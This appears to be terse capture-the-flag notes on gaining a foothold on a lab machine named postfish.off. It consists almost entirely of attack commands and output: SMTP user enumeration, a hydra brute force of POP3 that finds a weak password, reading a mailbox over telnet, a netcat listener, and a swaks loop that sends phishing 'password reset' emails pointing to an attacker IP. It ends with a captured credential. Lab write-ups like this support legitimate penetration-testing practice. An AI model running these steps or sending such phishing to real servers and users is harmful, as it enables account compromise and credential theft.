Foothold

First.Last
FLast
FirstL





$ nmap -p25 --script=smtp* postfish.off
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:57 CDT
Nmap scan report for postfish.off (192.168.185.137)
Host is up (0.039s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users:
|_ root
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

$ smtp-user-enum -U users.lower -t postfish.off
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lower
Target count ............. 1
Username count ........... 8
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Sep 11 06:18:51 2024 #########
postfish.off: brian.moore exists
postfish.off: hr exists
postfish.off: sales exists
postfish.off: legal exists
postfish.off: mike.ross exists
postfish.off: sarah.lorem exists
postfish.off: it exists
postfish.off: claire.madison exists
######## Scan completed at Wed Sep 11 06:18:53 2024 #########
8 results.
8 queries in 2 seconds (4.0 queries / sec)
claire.madison
mike.ross
brian.moore
sarah.lorem
it
hr
sales
legal

$ hydra -L users.lower -P users.lower postfish.off pop3 -vV -I -t 10

sales:sales

$ telnet postfish.off 110
Trying 192.168.211.137...
Connected to postfish.off.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets

$ nc -lnvp 80

$ for i in $(cat emails.txt); do swaks --to [email protected] --from [email protected] --header 'Subject: Password Reset Link' --body 'Reset your password and get pwned here http://192.168.45.168' --server 192.168.211.137; done

brian.moore:EternaLSunshinE